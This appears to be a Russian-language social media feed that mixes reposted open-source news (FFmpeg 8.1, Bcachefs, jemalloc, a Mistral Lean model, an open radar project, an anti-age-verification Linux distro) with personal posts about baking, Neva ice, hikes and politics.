Забавляет как часто в последнее время слышу (в том числе от живых людей) такие тезисы в оправдание "белых списков" и прочих глушений: мол, это нужно для нашей безопасности и чтобы беспилотник не попал в твой же дом!
Отбитость логики поражает, прямо новый уровень хлебушка-воробушка.
Даже, если предположить, что подобные меры эффективны (в чём есть сомнения), вроде как, должно быть очевидно, что если цель попасть в любой жилой дом, то достаточно попасть в окружность города (т.е. в круг 10-20-30 км), а там куда ни кинь - именно в дом и влетит. С этим справлялись даже немецкие Фау-2 (1944), летающие чисто на гироскопах, и уж явно за более чем 80 лет развития бабахала возможности растут. Появилось автономное наведение, автоматические довороты на цель, распознавание образов. Тем более, что если хочется расхуярить любую пятиэтажку с бабушками и кошками или чью-то избу, то не обязательно целиться в самую гущу.
Очевидно, что точное наведение нужно для поражения каких-то конкретных ценных целей, определённых заранее. И глушат как раз для того, чтобы туда не попало. А попало не туда. Что именно означает "не туда", если дело происходит в населённой местности (особенно центре мегаполиса, где больше всего глушат) - см. выше.
Тут, конечно, можно порассуждать на тему морали тоже. Если дрон не удаётся нейтрализовать, то точно ли попадание туда, куда задумывалось, по гуманитарным соображениям хуже попадания туда, чем пугают. Но мы не будем, не положено.
#ПрекрасноеНастоящее (а не #цензура и не #пиZдец)
Facebook возобновил разработку библиотеки управления памятью jemalloc
Компания Meta* объявила о возобновлении разработки библиотеки управления памятью jemalloc, репозиторий которой в июне прошлого года был переведён в архивный режим. Библиотека jemalloc предлагает альтернативную реализацию функций malloc, оптимизированную для снижения фрагментации и работы на многопроцессорных системах.
Отмечается, что компания Meta осознала преимущества от применения jemalloc в своей инфраструктуре и решила возобновить работу над кодом данной библиотеки для снижения издержек на сопровождение, модернизации кодовой базы, избавления от технического долга и адаптации аллокатора для новых видов нагрузки и актуального оборудования. Разработка будет продолжена в форме открытого проекта, развиваемого совместно с сообществом и приветствующего подключение к работе сторонних участников.
Библиотека jemalloc была разработана Джейсоном Эвансом (Jason Evans) в 2005 году для FreeBSD 7.0, после чего была портирована в NetBSD и интегрирована в состав Firefox. В 2009 году автор jemalloc перешёл на работу в компанию Facebook, в которой данная библиотека использовалась во внутренних проектах. В 2017 году Джейсон уволился из Facebook, а разработка была продолжена оставшейся командой из Facebook. После переименования в Meta приоритеты компании изменились, развитие библиотеки застопорилось, разработка сосредоточилась только на внутренних потребностях, а общедоступная кодовая база со временем деградировала. Для поддержания общедоступной библиотеки на плаву требовался значительный рефакторинг, но Джейсон
не готов был тратить своё время на эту работу и поэтому 10 месяцев назад перевёл репозиторий в архивный режим.
Среди планов, которые компания Facebook наметила реализовать после возрождения проекта:
- Снижение накопленного технического долга, проведение рафакторинга и чистки кодовой базы, усовершенствование библиотеки для сохранения эффективности, надёжности и простоты использования.
- Продолжение развития аллокатора HPA (Huge-Page Allocator) для оптимизации потребления ресурсов CPU за счёт более оптимального использования больших страниц памяти (transparent hugepage).
- Внесение изменений для повышения эффективности работы с памятью, связанных с улучшением упаковки структур, кэширования и очистки освобождённых блоков памяти.
- Добавление оптимизаций для архитектуры AArch64 (ARM64).
Источник: https://www.opennet.ru/opennews/art.shtml?num=65006
@iron_bug Да, весы как раз сломались в тот момент. Расстаивал часа три, но вряд ли в 2 раза поднялся, максимум в полтора.
Похоже, снесли последний симпатичный домик на ш. Революции в этом дворе. Сносили на выходных, я проезжал и видел груду пыли, а сегодня уже почти ничего не осталось, лишь груда мусора.
#СПб #ЛенинградНутряной
Mistral опубликовал Leanstral, AI-модель для вайб-кодинга с формальной верификацией
Компания Mistral AI представила большую языковую модель Devstral, нацеленную на использование для разработки приложений (вайб-кодинга) и оптимизированную для формальной верификации кода. Предполагается, что Devstral может применяться для создания AI-ассистентов, позволяющих не просто генерировать код, но и гарантировать отсутствие в нём ошибок.
Devstral стала первой открытой моделью, поддерживающей язык программирования Lean 4 и связанный с ним инструментарий для проверки математических доказательств. Lean 4 предоставляет возможности для математического доказательства корректности кода и его соответствия спецификации, что в контексте вайб-кодинга позволяет подтвердить, что сгенерированный AI-моделью код делает именно то, что задумано.
Модель охватывает 119 миллиардов параметров (6.5 млрд активируемых параметров на токен), учитывает контекст в 256 тысяч токенов и опубликована под лицензией Apache 2.0. Загружаемый архив с Leanstral занимает 121 ГБ и пригоден для использования на локальных системах. Для локального запуска могут применяться библиотеки vllm, transformers и SGLang.
Среди прочего модель может применяться для вайб-разработки в открытом агенте mistral-vibe, а также интегрироваться с инструментарием Aeneas для верификации кода на языке Rust. В качестве входных параметров принимается текст и изображения, на выходе выдаётся только текст. Поддерживается анализ содержимого изображений.
Для оценки возможностей AI-моделей с учётом качества проведения формальной верификации кода и написания математических доказательств разработан новый набор тестов FLTEval. В проведённых тестах модель Leanstral ощутимо обогнала существующие открытые модели Qwen3.5 397B-A17B, Kimi-K2.5 1T-A32B и GLM5 744B-A40B, показала сходные результаты с моделями Claude Haiku 4.5 и Claude Sonnet 4.6 от компании Anthropic, но отстала от модели Claude Opus 4.6. В частности, модель Opus набрала
39.6 баллов, а Leanstral - 21.9 при одном проходе и 31.9 при 16 проходах. При этом затраты при использовании Opus составили 1650 долларов, а Leanstral - $18 при одном проходе и $290 при 16 проходах. Модель Haiku набрала 23 балла при затратах $184, а модель Sonnet - 23.7 при затратах $549.
Источник: https://www.opennet.ru/opennews/art.shtml?num=65005
Выпуск мультимедиа-пакета FFmpeg 8.1
После семи месяцев разработки опубликован мультимедиа-пакет FFmpeg 8.1, включающий набор приложений и коллекцию библиотек для операций над различными мультимедиа-форматами (запись, преобразование и декодирование звуковых и видеоформатов). Пакет написан на языке Си и распространяется под лицензиями LGPL и GPL.
Среди изменений в FFmpeg 8.1:
- Добавлен экспериментальный декодировщик для формата кодирования звука Extended xHE-AAC (High-Efficiency Advanced Audio Coding) со схемой объёмного звука Mps212 (MPEG Surround с раскладкой каналов 212). xHE-AAC используется в потоковом вещании Netflix и задействован в технологиях цифрового радиовещания Digital Radio Mondiale. Кодек примечателен поддержкой широкого диапазона битрейта (от 12 до 300 kbit/s), высокой степенью сжатия, средствами воспроизведения с постоянной громкостью, обеспечением высокой чёткости при любых уровнях громкости, дополнительными профилями управления динамическим диапазоном при прослушивании в шумных местах и добавлением метаданных, позволяющих восстанавливать потери на принимающей стороне.
- На базе библиотеки libmpeghdec реализован декодировщик для интерактивного и объёмного звука в формате NGA (Next Generation Audio), определённого в стандарте кодирования звука и видео MPEG-H.
- Реализован парсер для метаданных в формате EXIF и сопутствующий API для разбора метаданных.
- Добавлена поддержка разбора и перенаправления метаданных в формате LCEVC (Low Complexity Enhancement Video Coding), реализующем поверх штатных кодеков дополнительный слой с метаданными для улучшения качества видео. Добавлена поддержка экспорта слоёв улучшения качества LCEVC в мультимедийные контейнеры MPEG-TS (MPEG Transport Stream).
- Добавлены парсер, кодировщик и декодировщик, а также упаковщик и распаковщик мультимедийных контейнров (muxer/demuxer), для формата изображений JPEG XS, который позиционируется как легковесная система кодирования изображений, обеспечивающая минимальные задержки при кодировании и декодировании, и ориентированная на оптимизацию передачи последовательностей изображений очень высокого качества (до 8K). JPEG XS позволяет существенно снизить необходимую пропускную способность канала связи без заметных для человеческого глаза потерь качества.
- На базе графического API Vulkan реализованы кодировщик и декодировщик для кодека Apple ProRes, а также декодировщик для применяемого в кинопроизводстве формата раздельной передачи кадров DPX (Digital Picture Exchange). Реализации на базе API Vulkan примечательны значительным повышением производительности за счёт аппаратного ускорения, распараллеливания операций и задействования вычислительных шейдеров. Для ускорения инициализации кодека реализована возможность использование уже скомпилированных шейдеров GLSL, без необходимости их компиляции во время работы. Проведена оптимизация реализаций кодеков на основе AI Vulkan.
- В библиотеке swscale (Software Scaler), применяемой в FFmpeg для программного масштабирования и преобразования цветов, реализован бэкенд, использующий для ускорения выполнения операций графический API Vulkan.
- Добавлены варианты кодировщиков форматов H.264 и AV1, использующие
API D3D12 (Direct3D 12) для аппаратного ускорения кодирования.
- Добавлен вариант кодировщика формата H.264/HEVC, использующий доступные в чипах Rockchip средства аппаратного кодирования видео.
- Добавлена поддержка упаковки и распаковки пространственного звука в формате IAMF (Immersive Audio Model and Formats) с объёмным звучанием в режиме Ambisonics, учитывающем распространение звука не только в горизонтальной плоскости, но и в вертикальной (для определения сверху или снизу источник звука).
- Добавлен распаковщик (demuxer) мультимедийных контейнеров в форматах HXVS и HXVT, применяемых в IP-камерах.
- В утилиту ffprobe добавлена опция "-codec" ("-c") для выбора определённой реализации декодировщика.
- В утилиту ffmpeg добавлена поддержка мозаичного режима (tiled) хранения изображений в формате HEIF (когда очень большое изображение сохраняется в форме набора из более мелких изображений).
- Удалён старый обработчик протокола HLS.
- Новые фильтры:
- drawvg для вывода векторной графики поверх видеокадров, используя библиотеку libcairo.
- vpp_amf для изменения размера и преобразования цветового пространства видео, используя для аппаратного ускорения AMD Advanced Media Framework.
- vf_scale_d3d12, vf_deinterlace_d3d12, vf_mestimate_d3d12 для масштабирования, деинтерлейсинга и анализа движения на видео, используя для аппаратного ускорения графический API Direct3D 12.
- gfxcapture для захвата содержимого окон и экрана на платформе Windows при помощи API Windows.Graphics.Capture.
- Добавлен bitstream-фильтр для метаданных LCEVC.
Источник: https://www.opennet.ru/opennews/art.shtml?num=65004
Выпуск файловой системы Bcachefs 1.37.0
Кент Оверстрит (Kent Overstreet) опубликовал выпуск файловой системы Bcachefs 1.37.0. Выпуск охватывает два пакета: bcachefs-kernel-dkms с модулем ядра, собираемым при помощи системы DKMS (Dynamic Kernel Module Support), и bcachefs-tools с запускаемой в пространстве пользователя утилитой bcachefs, реализующей команды для создания (mkfs), монтирования, восстановления и проверки ФС. Пакеты собраны для Debian, Ubuntu, Fedora, openSUSE, NixOS и Arch Linux. DKMS-модуль поддерживает работу с ядрами Linux, начиная с 6.16.
В новой версии:
- Стабилизирована и объявлена готовой к повсеместному использованию поддержка кодов коррекции ошибок, позволяющих восстанавливать повреждённые данные по аналогии с RAID 5/6. Реализация основана на кодировании
Рида-Соломона, способном исправить до N ошибок в страйпе (stripe) при наличии N избыточных блоков. Обеспечено автоматическое восстановление деградировавших страйпов. Добавлена возможность применения кодов восстановления в конфигурациях с накопителями разного размера.
- Добавлена поддержка находящегося в разработке ядра Linux 7.0.
- Реализованы новые команды "subvolume list" для вывода подразделов с фильтрацией и сортировкой; "subvolume list-snapshots" для показа снапшотов в древовидной форме'; "subvolume reflink-option-propagate" для применения параметров ввода-вывода файла, таких как сжатие, контрольная сумма, количество реплик и список целевых устройств, к экстентам файла.
- Стабилизирована операция раскрутки (rewind) журнала.
- Обеспечено автоматическое восстановление при использовании устройств с некорректной поддержкой команд для сброса прокэшированных операций записи на накопитель (flush и FUA).
- Ускорено восстановление после некорректного завершения работы.
- Повышена производительность ФС, охватывающих несколько устройств.
- Запускаемые в пространстве пользователя утилиты bcachefs переписаны на языке Rust.
В будущем планируется переписать на Rust и компоненты ФС, работающие на уровне ядра.
Началась работа по использованию инструментария Verus для формальной верификации кода на Rust.
Проектом Bcachefs развивается файловая система, нацеленная на сочетание расширенной функциональности, свойственной Btrfs и ZFS, и уровня производительности, надёжности и масштабируемости, характерного для XFS. Bcachefs поддерживает такие возможности, как включение в раздел нескольких устройств, многослойные раскладки накопителей (нижний слой с часто используемыми данными на базе быстрых SSD, а верхний слой с менее востребованными данными из жестких дисков), репликация (RAID 1/10), кэширование, прозрачное сжатие данных (режимы LZ4, gzip и ZSTD), срезы состояния (снапшоты), верификация целостности по контрольным суммам, коды коррекции ошибок, хранение информации в зашифрованном виде (используются ChaCha20 и Poly1305).
Источник: https://www.opennet.ru/opennews/art.shtml?num=65003
@iron_bug @vovanium Есть также мнение, что похолодание и ладожский ледоход совпадают по причине северо-восточного холодного ветра, который как бы лёд и гонит. С другой стороны, лёд ведь и так пойдёт по течению..
@iron_bug Ну я такую форму и использую, но до палочки не додумался. Ещё забыл муку просеять, и замешивал на глаз, приблизительно.
Ещё раз решил выпечь #хлеб в духовке, ставил даже в два раза дольше, чем рекомендовали, а внутри кажется сыроват. Что теперь делать хз, пожарить что ли...
@iron_bug Ну может это совпадение))
@iron_bug Думаю, всё же это был невский лёд, слишком быстро прошёл. Ладожский идёт несколько дней, и тогда в городе холодает.
Хм, а по Неве пошёл лёд. С утра ещё смотрел, ничего не было.
Интересно, это ещё не ладожский?
#СПб
@wthinker
Что-то примерно такое же было и в 20 году.
@dominic @ivanhead
@johan @wthinker @ivanhead @dominic Слава Ящеру! (ЕВПОЧЯ)
Выпуск свободной игры SuperTux 0.7.0
После более четырёх лет разработки опубликован выпуск классической игры-платформера SuperTux 0.7.0, напоминающей по стилю Super Mario. Игра распространяется под лицензией GPLv3 и доступна в сборках для Linux (AppImage, Flatpak), Android, Windows и macOS.
Среди изменений в новом выпуске:
- Добавлены новые спрайты и реализованы такие возможности, как скольжение по склонам, ползание, прыжки на попе и катящиеся камни.
- Переделана графика большинства фонов, объектов и врагов.
- Полностью переработаны уровни Story Mode, Revenge in Redmond и Bonus Island I.
- Добавлены новые неигровые персонажи (например, Granito) и враги (например, DiveMine, Fish и Corrupted Granito), а также переработаны многие ранее существовавшие враги: GoldBomb, Igel, Ghoul, Yeti и Ghost Tree.
- Добавлена новая музыка.
- Переработан редактор уровней.
- Добавлен режим локальной многопользовательской игры.
- Предложены новые элементы геймплея: сверкающие враги, ключи, карман для предметов и разблокируемые через Tux Dolls бонусные острова.
- Проведён рефакторинг кода и осуществлён переход на обвязку SimpleSquirrel для использования скриптового языка Squirrel.
- Возвращена поддержка платформы Android и добавлены пакеты в формате Flatpak.
Источник: https://www.opennet.ru/opennews/art.shtml?num=65002
@dominic @ivanhead Ну что значит "хавают"? Не верит никто вообще, да и как поверить абсолютной чуши, которую несут (видел ролик, где спрашивают и какую-то бабу в белом халате, и чиновника, типа, а что за болезнь, и они как роботы отвечают "очень опасное заболевание"). Люди сопротивляются как могут, просто пока не дошли до края, за которым даже и попытки диалога не будет.
@ivanhead А по мне - так обычный беспредел. Просто очень неожиданно возникла "какая-то инфекция", как раз перед запуском онвамнедимоновского свечного заводика.
Просто беспредел уже настолько немудрёный, что аж диву даёшься, как народ всё это хавает.
Как пел Слепаков "И не заметить уже невозможно моих двух-ходовых схем."
@wthinker @ivanhead Одобряю!
@ivanhead @wthinker Ну всё верно, усиливает, единственно, что легче волевым усилием перевести внимание на другие темы. Ну и "замедлиться" ещё, если внимание и нервы сильно распылены.
@ivanhead @wthinker Да, лучшее опробованное лично дозированное применение алко - в экстремальной ситуации, например, когда случился пиздец-пиздец и надо прямо сейчас прийти в себя, или когда оставляют силы, а нужно ещё совершить физическое усилие.
@mansalia Говорят, будет ещё увеличиваться.
@vovanium Всё ради нологов!
@wthinker @ivanhead Ну всё же алкоголь может помочь отвлечься, особенно, если гложут невесёлые мысли. Но может и усугубить их!
Увеличение длительности суток составляет 1,33 миллисекунды в столетие — это наиболее высокий темп за последние 3,6 млн лет.
Выпуск CSMWrap 3.0, прослойки для загрузки в режиме BIOS на системах с UEFI
Опубликован выпуск проекта CSMWrap 3.0, развивающего EFI-приложение для загрузки систем, поддерживающих только устаревшие платформы с BIOS, в современных окружениях на базе UEFI. CSMWrap воссоздаёт окружение c BIOS на системах UEFI (class 3), упаковывая сборку SeaBIOS в форме модуля CSM (Compatibility Support Module) и запуская как внешнее EFI-приложение. Код проекта написан на языке Си и распространяется под лицензией LGPL-2.1.
Проектом предоставляются 64- и 32-разрядные сборки EFI-приложения, которые достаточно разместить в каталоге /EFI/BOOT/ в разделе с ФС FAT на носителе с операционной системой, способной загружаться только в окружениях с BIOS. UEFI-прошивка распознает подобный носитель и покажет в числе загрузочных устройств. На загружаемом устройстве желательно использовать таблицы разделов в формате MBR.
В ветке CSMWrap 3.0 добавлена поддержка файла конфигурации csmwrap.ini, который можно разместить в одном каталоге с исполняемым файлом EFI для указания дополнительных настроек. Реализована возможность указания в файле конфигурации параметров последовательного порта для отладочного вывода, пути к альтернативному VGABIOS (вместо SeaVGABIOS), PCI-адреса видеокарты, флагов для отключения IOMMU и подавления вывода на экран информации о работе CSMWrap, показываемой помимо баннера и сообщений о сбоях.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64998
Открытый радар AERIS-10, способный отслеживать объекты на расстоянии до 20 км
Проект AERIS-10 развивает полностью открытую модульную радиолокационную станцию (радар), которую можно использовать в качестве платформы для проведения экспериментов c фазированными антенными решётками, сжатием импульсов, доплеровской обработкой сигналов и отслеживанием целей. Полные схемы, распайки печатных плат, списки комплектующих (BOM), Gerber-фалы для изготовления плат, макеты для 3D-печати и описания аппаратных блоков на языках Verilog/VHDL распространяются под лицензией CERN-OHL-P (CERN Open Hardware Licence). Код прошивки для микроконтроллера STM32, вспомогательные утилиты на Си и графический интерфейс на Python поставляются под лицензией MIT.
Подготовлено два варианта радиолокационной станции на фазированных антенных решётках - AERIS-10N (Nexus) и AERIS-10E (Extended). Оба варианта используют частоту 10.5 ГГц и используют импульсную линейную частотную модуляцию (LFM). Отличия сводятся к использованию массива плоскостных антенн 8x16 и массива щелевых излучателей в диэлектрически заполненном волноводе 32x16, обеспечивающих дальность действия до 3 км и 20 км, соответственно, а также мощности сигнала (1Wx16 и 10Wx16).
Система модульная с раздельными платами управления питанием, генерации частот и RF-блоками. Для обработки сигналов, сжатия импульсов, вычисления скорости объекта при помощи доплеровского быстрого преобразования Фурье, исключения неподвижных объектов (MTI) и обеспечения постоянного уровня ложных тревог (CFAR) задействован FPGA XC7A100T. Вращение антены на 360° обеспечивает шаговых двигатель. Управление работой и настройка периферийных устройств осуществляется при помощи микроконтроллера STM32F746xx.
Корректировка положения и ориентации в режиме реального времени обеспечивается при помощи GPS и инерциальных датчиков (акселерометр, гироскоп). Реализовано электронное управление сканирующим лучом в пределах ±45° по высоте и азимуту. Возможно одновременное отслеживание движения нескольких объектов. Для управления радаром, наглядного отслеживания движущихся объектов и их сопоставления с картой реализован графический интерфейс.
Сборка радара осуществляется из типовых элементов, имеющихся в широкой продаже. Затраты на чипы и компоненты для изготовления радара в простейшей конфигурации оценивается приблизительно в 5000 долларов. Для сравнения стоимость коммерческих радаров того же класса начинается с 250 тысяч долларов.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64999
Выпуск CSMWrap 3.0, прослойки для загрузки в режиме BIOS на системах с UEFI
Опубликован выпуск проекта CSMWrap 3.0, развивающего EFI-приложение для загрузки систем, поддерживающих только устаревшие платформы с BIOS, в современных окружениях на базе UEFI. CSMWrap воссоздаёт окружение c BIOS на системах UEFI (class 3), упаковывая сборку SeaBIOS в форме модуля CSM (Compatibility Support Module) и запуская как внешнее EFI-приложение. Код проекта написан на языке Си и распространяется под лицензией LGPL-2.1.
Проектом предоставляются 64- и 32-разрядные сборки EFI-приложения, которые достаточно разместить в каталоге /EFI/BOOT/ в разделе с ФС FAT на носителе с операционной системой, способной загружаться только в окружениях с BIOS. UEFI-прошивка распознает подобный носитель и покажет в числе загрузочных устройств. На загружаемом устройстве желательно использовать таблицы разделов в формате MBR.
В ветке CSMWrap 3.0 добавлена поддержка файла конфигурации csmwrap.ini, который можно разместить в одном каталоге с исполняемым файлом EFI для указания дополнительных настроек. Реализована возможность указания в файле конфигурации параметров последовательного порта для отладочного вывода, пути к альтернативному VGABIOS (вместо SeaVGABIOS), PCI-адреса видеокарты, флагов для отключения IOMMU и подавления вывода на экран информации о работе CSMWrap, показываемой помимо баннера и сообщений о сбоях.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64998
The "rewrite it in rust" has been replaced by the "rewrite it with Claude™".
приличного человека можно узнать по трём смартфонам:
- для улицы
- для дома
- для мессенджера max
Выпуск River 0.4.0 с разделением композитного и оконного менеджеров
Представлен релиз композитного менеджера River 0.4.0, который в отличие от других композитных менеджеров на базе протокола Wayland использует модульную архитектуру с выделением оконного менеджера в отдельную программу. В River оконные менеджеры являются подключаемыми и пользователь может выбирать их на свой вкус. Код проекта написан на языке Zig и распространяется под лицензией GPLv3.
River может выполняться как во вложенных сеансах, запущенных поверх других X11- и Wayland-серверов, так и без прослоек, используя для вывода драйверы KMS/DRM. Для разделения функциональности композитного и оконного менеджеров проектом развивается Wayland-протокол river-window-management-v1. В оконный менеджер выносятся такие функции, как декорирование окон, управление фокусом ввода, указателем, клавиатурными комбинациями, позицией и размером окон.
Возможна замена оконных менеджеров на лету, без прерывания сеанса. На выбор предлагается 16 оконных менеджеров, совместимых с River, среди которых имеются оконные менеджеры мозаичные в стиле DWM или xmonad, Emacs-подобные в стиле EXWM, классические стековые и на основе прокручиваемой ленты. Для запуска X11-приложений поддерживается использование Xwayland.
Среди причин разделения композитного и оконного менеджеров упоминается: снижение порога для написания оконных менеджеров; возможность реализации оконных менеджеров на высокоуровневых языках со сборкой мусора, не влияющих на производительность композитного менеджера; возможность горячей замены оконных менеджеров без перезапуска композитного сервера и запущенных графических программ;
упрощение проведение экспериментов, связанных с дизайном оконных менеджеров.
Из ограничений протокола river-window-management-v1 отмечается отсутствие функциональности, выходящей за рамки 2D-операций с рабочим столом, например, не поддерживается создание сложных эффектов и 3D-интерфейсов для систем виртуальной реальности. Эффекты пока ограничиваются простой анимацией, но в будущем планируется реализация более сложных эффектов при помощи шейдеров.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64997
Выпуск мультимодельного IPTV-оркестратора IP_TV-Neon 0.8.2
Вышла новая версия IP_TV-Neon, легковесного инструмента для управления и поиска IPTV-контента. Проект примечателен использованием больших языковых моделей для навигации по спискам каналов. IP_TV-Neon предоставляет минималистичный и быстрый консольный интерфейс, избавленный от избыточной функциональности стандартных медиацентров и оптимизированы для систем с медленными дисками и старыми процессорами (разработка велась на базе iMac 2014 года под управлением CachyOS). Для воспроизведения вызывается внешний проигрыватель mpv. Код написан на языке Rust и распространяется под лицензией MIT.
Основные изменения:
- К существующей интеграции с DeepSeek добавлена поддержка Google Gemini, что позволяет пользователю выбирать предпочтительный движок для семантического поиска и формирования динамических плейлистов на основе естественного языка.
- Реализован механизм интеллектуальной фильтрации. Система способна обрабатывать запросы вида "найди научно-популярные каналы с английской звуковой дорожкой" или "сформируй список телеканалов по рейтингу", анализируя метаданные из локальных или удалённых списков воспроизведения в формате M3U.
Источник: https://www.opennet.ru/opennews/art.shtml?num=64996
В городе снега почти нет, зато много машин, людей и песка. На севере перешейка снег лежит полосами. Кое-где он даже ещё замёрзший, по нему можно спокойно идти, дальше уже проваливаешься, а потом уже и глубокая лужа, покрытая некрепким ледком. Поднимаешься с дороги на холмы-мяки, проваливаясь в снег по колено, перескакиваешь через чьи-то траншеи и огневые точки, а вершина уже зелёная, и всё пространство, что охватывает глаз, зелёное, птицы поют песни весны. Прямо волшебная зелёная страна с висящими клоками уснеи и брусничными кочками. На картах точки вроде не обозначены, да и вряд ли они слишком высокие, думаю, метров 80. Но чуть спускаешься с одной, как видишь рядом ещё выше. На двух деревьях рядом кто-то соорудил деревянные ступени, но начинаются они не от самой земли, надо каким-то образом подпрыгнуть. Стоит особым образом вытесанный пень — то ли престол, то ли алтарь. Из окопов выглядывает осторожная белка. Идёшь дальше, за ней новая вершина. Потом ещё одна, самая высокая. Ориентир - огромная матёрая сосна, нескольким людям в обхват. А за ней... Как раз Искалеченные Земли. Глядишь вниз, и почти сколько хватает глаз, полосы снега и песка, с пеньками спиленных деревьев, дорожная колея. Вдалеке - непонятно почему пощажённые островки соснового леса.
#ЛенинградНутряной
(#monochromemarch)
@iron_bug Ну может преувеличил слегка, но одному сложно обхватить.
В городе снега почти нет, зато много машин, людей и песка. На севере перешейка снег лежит полосами. Кое-где он даже ещё замёрзший, по нему можно спокойно идти, дальше уже проваливаешься, а потом уже и глубокая лужа, покрытая некрепким ледком. Поднимаешься с дороги на холмы-мяки, проваливаясь в снег по колено, перескакиваешь через чьи-то траншеи и огневые точки, а вершина уже зелёная, и всё пространство, что охватывает глаз, зелёное, птицы поют песни весны. Прямо волшебная зелёная страна с висящими клоками уснеи и брусничными кочками. На картах точки вроде не обозначены, да и вряд ли они слишком высокие, думаю, метров 80. Но чуть спускаешься с одной, как видишь рядом ещё выше. На двух деревьях рядом кто-то соорудил деревянные ступени, но начинаются они не от самой земли, надо каким-то образом подпрыгнуть. Стоит особым образом вытесанный пень — то ли престол, то ли алтарь. Из окопов выглядывает осторожная белка. Идёшь дальше, за ней новая вершина. Потом ещё одна, самая высокая. Ориентир - огромная матёрая сосна, нескольким людям в обхват. А за ней... Как раз Искалеченные Земли. Глядишь вниз, и почти сколько хватает глаз, полосы снега и песка, с пеньками спиленных деревьев, дорожная колея. Вдалеке - непонятно почему пощажённые островки соснового леса.
#ЛенинградНутряной
(#monochromemarch)
Russian government wants to ban Telegram because Ukrainians are recruiting Russians for terrorist attacks.
Ukrainian government wants to ban Telegram because Russians are recruiting Ukrainians for terrorist attacks.
:acat_loading:
@shuro @Anakoyhren Никогда ничего от них не покупал. Давно известно как они разоряют людей и загаживают землю.
Представляю свои страницы про Delta Chat. Я постарался покрыть все популярные вопросы, не перегружая лишней информацией. Учтены актуальные разработки, так как последние месяцы было добавлено много чего интересного, и другие руководства уже устарели.
software/delta-chat: Подробная информация о функциях и возможностях, технические детали и ответы на вопросы.
guides/delta-chat: Простое руководство по использованию и введение в основные функции.
guides/delta-chat-email: Использование с классической электронной почтой для продвинутых пользователей.
Я проделал много работы. Надеюсь, вам понравятся эти страницы и сам Delta Chat. Как всегда принимаются любые предложения и исправления.
@shuro @dlmk слышал теорию заговора, что украинские спецслужбы просочились в спецслужбы российские и специально заставляют Россию делать больше и больше блокировок, отрезаяя её от глобального мира 
@iron_bug Да, но схема мутная, я не всё понял. Возможно они ещё стоимость этого единого проезда прибавляют при выезде из города.
@shuro Везде предатели, так бы давно со всем разобрались!
@Revertron @dlmk @shuro Всё так.
Создан дистрибутив Ageleless Linux для противодействия законам о проверке возраста
Опубликован дистрибутив Ageleless Linux, созданный для противостояния законам, предписывающим добавление в операционные системы API для проверки возраста пользователей. Ageleless Linux отмечен как дистрибутив для людей неопределённого возраста, принципиально не соответствующий законам о проверке возраста. Среди прочего, дистрибутив реализует заглушку с API для верификации возраста пользователей, всегда возвращающую неопределённый возраст.
Для установки предлагается скрипт become-ageless.sh, позволяющий сконвертировать любой уже установленный Debian GNU/Linux в Ageleless Linux. Скрипт заменяет файл /etc/os-release и включает в него информацию о несоблюдении законов о проверке возраста (COMPLIANCE_STATUS="refused", API_STATUS="refused", VERIFICATION_STATUS="flagrantly noncompliant"), добавляет каталог /etc/ageless/ с отчётами о нарушаемых законах и реализует прототип фиктивного API для выдачи приложениям информации о возрасте пользователей. Реализация API сводится к скрипту /etc/ageless/age-verification-api.sh, который на все запросы выдаёт ошибку "ERROR: Age data not available" с примечанием, что все пользователи в системе имеют неопределённый возраст.
По мере реализации механизмов проверки возраста в дистрибутивах, скрипт намерены расширять средствами для удаления или блокирования подобных механизмов в различных дистрибутивах. Например, в случае реализации D-Bus интерфейса "org.freedesktop.AgeVerification1" в Fedora Linux, скрипт будет адаптирован для применения в Fedora для удаления обработчика, реализующего данный интерфейс, или предоставления пакетов в альтернативным обработчиком, возвращающим неопределённый возраст. Аналогично, в случае появления запроса возраста в инсталляторе Ubuntu, скрипт будет расширен для удаления данного запроса, а если Debian интегрирует в сервис AccountsService передачу информации о возрасте, проект Ageleless Linux возьмёт на себя поддержание изменённого форка AccountsService.
Принятые или находящиеся на стадии утверждения законы, предписывающие реализацию проверки возраста, не запрещают распространение операционных систем без подтверждения возраста, но предусматривают штрафы к поставщикам, ответственным за разработку, лицензирование или установку подобных операционной системы. После запуска скрипта от проекта Ageleless Linux пользователь принимает на себя роль "поставщика операционной системы". Предполагается, что если ребёнок воспользуется компьютером с Ageleless Linux, установивший данный дистрибутив пользователь может рассматриваться как поставщик, предоставивший операционную систему ребёнку без указания его возраста во время создания учётной записи. При этом педполагается, что в подобной ситуации нет пострадавших детей, а есть лишь лица, чей возраст неизвестен.
Проект также намерен распространять устройства на базе платформы Milk-V Duo S, удовлетворяющие предписаниям Закона Калифорнии AB1043, но намеренно не выполняющие его требования. Также планируется запустить каталог приложений store.agelesslinux.org, через который предоставить возможность установки распространяемых устройствах среды обучения языку Python, текстового редактора, игры "Змейка", IRC-клиента с предупреждением об опасности общения с незнакомыми людьми и 8-строчный скрипт "peepee", выводящий на экран слово "peepee" (предполагается, что за установку подобного скрипта без верификации возраста можно получить штраф).
Создатели Ageleless Linux пытаются продемонстрировать абсурдность вводимых законов проверки возраста, распространяя устройства с явным, документированным и преднамеренным нарушением закона AB1043, сулящего получение штрафа. В январе 2027 года подобные устройства планируют раздавать детям на школьных ярмарках и библиотечных мероприятиях.
Отмечается, что получение штрафа лучше всяких обсуждений раскроет суть витиеватых формулировок в законе и позволит понять, подпадает ли изменяющий систему bash-скрипт под определение "поставщик операционной системы", считается ли специализированная плата "устройством общего назначения" и можно ли наложить штрафы за "каждого пострадавшего ребёнка" в случае отсутствия возможности посчитать пострадавших детей.
По мнению автора проекта, принимаемые законы о проверке возраста являются скорее защитным барьером и созданием инфраструктуры слежки, чем заботой о безопасности детей. Предъявляемым законом требованиям уже соответствуют крупнейшие производители, такие как Apple, Google и Microsoft, но при этом законы могут привести к неподъёмным издержкам у небольших производителей ОС и проектов, развиваемых энтузиастами. Во многих случаях не реализовавшим требования проверки возраста проектам проще отказаться от распространения в юрисдикциях с подобными законами, так как затраты на юридическую защиту превысят годовой бюджет большинства открытых проектов.
